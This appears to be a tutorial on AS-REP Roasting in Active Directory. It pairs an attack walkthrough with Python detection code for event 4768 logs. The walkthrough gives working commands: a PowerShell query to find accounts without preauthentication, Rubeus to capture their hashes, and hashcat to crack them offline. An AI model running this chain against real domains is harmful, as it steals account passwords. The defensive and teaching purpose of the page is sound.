AS-REP Roasting targets Active Directory accounts with the "Do not require Kerberos preauthentication" flag enabled. When preauthentication is disabled, the domain controller returns an AS-REP message encrypted with the user's password hash. Attackers capture this message and then perform offline brute-force or dictionary attacks to recover the plaintext password.

Attack Vector:
Targets AD accounts configured to bypass Kerberos preauthentication.
Mechanism:
Without preauthentication, the domain controller issues an AS-REP containing data encrypted with the user's password hash. This data can be captured and cracked offline, revealing the account’s plaintext password.
Objective:
Find accounts with the "Do not require Kerberos preauthentication" flag enabled.
Example Command (PowerShell):
Get-ADUser -Filter * -Properties DoesNotRequirePreAuth |
Where-Object { $_.DoesNotRequirePreAuth -eq $True -and $_.Enabled -eq $True } |
Select-Object SamAccountName, DoesNotRequirePreAuth
Example Output:
SamAccountName DoesNotRequirePreAuth
-------------- ----------------------
ESMERALDA_MIRANDA True
jdoe True
Process:
Use Rubeus to capture AS-REP messages from vulnerable accounts.
Example Command:
Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\hashes.txt
Example Outcome (one line per roastable account in hashes.txt; user and realm shown as placeholders, remainder of the hash elided):
$krb5asrep$23$<user>@<DOMAIN>:b4d9969983602fa94d7fe07f55a2a0a2$...
Objective:
Crack the captured AS-REP hash to reveal the plaintext password.
Example Command Using Hashcat:
hashcat64.exe -m 18200 C:\Temp\hashes.txt dictionary.dict
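The chain above leaves a consistent trace on the domain controller: Security event 4768 (Kerberos TGT requested) with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4), the etype that yields a hashcat mode 18200 hash. The following is an added example, not part of the original page, that classifies such records and groups them by requesting host; the 4768 records are constructed, and the field names follow the standard event schema.

```python
from collections import defaultdict

# Added example, not from the page: classify Windows Security event 4768 records.
# PreAuthType 0 = AS-REP issued without preauthentication; TicketEncryptionType
# 0x17 = RC4-HMAC, the etype roasting tools request so the hash cracks with
# hashcat mode 18200; Status 0x0 = the request succeeded.
RC4_ETYPE = 0x17

def _as_int(value):
    """Exporters emit '0x17', '23' or 23; normalise to int."""
    return value if isinstance(value, int) else int(str(value), 0)

def classify_4768(event):
    """Return 'roastable-rc4', 'no-preauth' or None for one 4768 record."""
    if event.get("EventID") != 4768 or _as_int(event.get("Status", "0x1")) != 0:
        return None                    # failed requests never yield an AS-REP
    if _as_int(event.get("PreAuthType", 2)) != 0:
        return None                    # preauthentication happened: normal logon
    if _as_int(event.get("TicketEncryptionType", 0)) == RC4_ETYPE:
        return "roastable-rc4"         # exactly what a roasting run leaves behind
    return "no-preauth"                # flag is set, but AES etype: inventory it

def find_roasting_sources(events, min_accounts=2):
    """Map client IP -> accounts it pulled RC4 AS-REPs for without preauth.
    One source doing this for several accounts is the roasting sweep signature."""
    per_source = defaultdict(set)
    for ev in events:
        if classify_4768(ev) == "roastable-rc4":
            per_source[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(u) for ip, u in per_source.items() if len(u) >= min_accounts}

def accounts_without_preauth(events):
    """Every successful 4768 with PreAuthType 0 names an account that still has
    the 'Do not require Kerberos preauthentication' flag, whatever the etype."""
    return sorted({ev["TargetUserName"] for ev in events if classify_4768(ev)})

# Constructed sample: two roastable accounts hit from one host, a normal AES
# logon, a no-preauth account requesting AES, and a failed (unknown user) request.
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "jdoe", "IpAddress": "10.0.0.25",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "ESMERALDA_MIRANDA", "IpAddress": "10.0.0.25",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.40",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc-legacy", "IpAddress": "10.0.0.40",
     "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "ghost", "IpAddress": "10.0.0.25",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6"},
]
```

The accounts returned by accounts_without_preauth are the same set the Get-ADUser query above enumerates, so the log-derived list doubles as a check that the flag has actually been cleared after remediation.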